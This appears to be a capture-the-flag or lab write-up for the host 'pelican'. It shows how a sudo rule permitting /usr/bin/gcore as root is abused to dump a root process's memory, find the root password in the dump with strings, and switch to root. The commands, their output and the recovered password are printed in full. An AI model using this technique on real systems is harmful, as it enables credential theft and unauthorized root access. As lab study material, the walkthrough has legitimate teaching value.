sudo gcore
The charles user has sudo privileges to execute /usr/bin/gcore as any user (root included) without being prompted for a password. gcore is a gdb wrapper that attaches to a running process and writes its memory out to a core file, so being allowed to run it as root means we can dump the memory of any root-owned process and search it for secrets.
charles@pelican:/var/tmp$ ps auxwww | grep -i password
root 490 0.0 0.0 2276 128 ? Ss 17:21 0:00 /usr/bin/password-store
There was an unknown binary, /usr/bin/password-store (PID 490), running as the root account. Note that ps only shows the user the process runs as; whether the file is actually SUID is a separate check (ls -l /usr/bin/password-store), and it does not matter for this attack path.
Based on the name alone, I would guess that it stores passwords in memory.
Since it runs as root, the gcore sudo rule should let me dump the process memory and read whatever it holds.
charles@pelican:/var/tmp$ sudo -u root /usr/bin/gcore 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.490
[Inferior 1 (process 490) detached]
Dumping the process memory (gcore writes core.<pid> into the current directory, so run it from a writable location such as /var/tmp; the "No such file or directory" line is only gdb failing to find the glibc source and is harmless):
charles@pelican:/var/tmp$ sudo -u root /usr/bin/gcore 490
sudo -u root /usr/bin/gcore 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.490
[Inferior 1 (process 490) detached]
charles@pelican:/var/tmp$ strings core.490
strings core.490
CORE
password-store
/usr/bin/password-store
CORE
CORE
/usr/bin/passwor
////////////////
LINUX
/usr/bin/passwor
////////////////
IGISCORE
CORE
ELIFCORE
/usr/bin/password-store
/usr/bin/password-store
/usr/lib/x86_64-linux-gnu/libc-2.28.so
/usr/lib/x86_64-linux-gnu/libc-2.28.so
/usr/lib/x86_64-linux-gnu/ld-2.28.so
/usr/lib/x86_64-linux-gnu/ld-2.28.so
fork failed!
/tmp
[...REDACTED...]
linux-vdso.so.1
tls/x86_64/x86_64/tls/x86_64/
/lib/x86_64-linux-gnu/libc.so.6
/usr/bin/passwor
////////////////
/usr/bin/passwor
////////////////
001 Password: root:
ClogKingpinInning731
x86_64
/usr/bin/password-store
HOME=/root
LOGNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/root
/usr/bin/password-store
[...REDACTED...]
The dump contains the line "001 Password: root:" immediately followed by a string that appears to be the root account's password: ClogKingpinInning731. A faster way to find it in a large dump is strings core.490 | grep -i -A1 password. Keep in mind that core.490 now holds this secret on disk, so remove it once you are done.
charles@pelican:/var/tmp$ su root
Password: ClogKingpinInning731
root@pelican:/var/tmp# whoami
root
root@pelican:/var/tmp# hostname
pelican
root@pelican:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:09:fe brd ff:ff:ff:ff:ff:ff
inet 192.168.132.98/24 brd 192.168.132.255 scope global noprefixroute ens192
valid_lft forever preferred_lft forever
The credential is confirmed to be the root account's password: we now have a root shell on pelican (192.168.132.98).
System-level compromise achieved.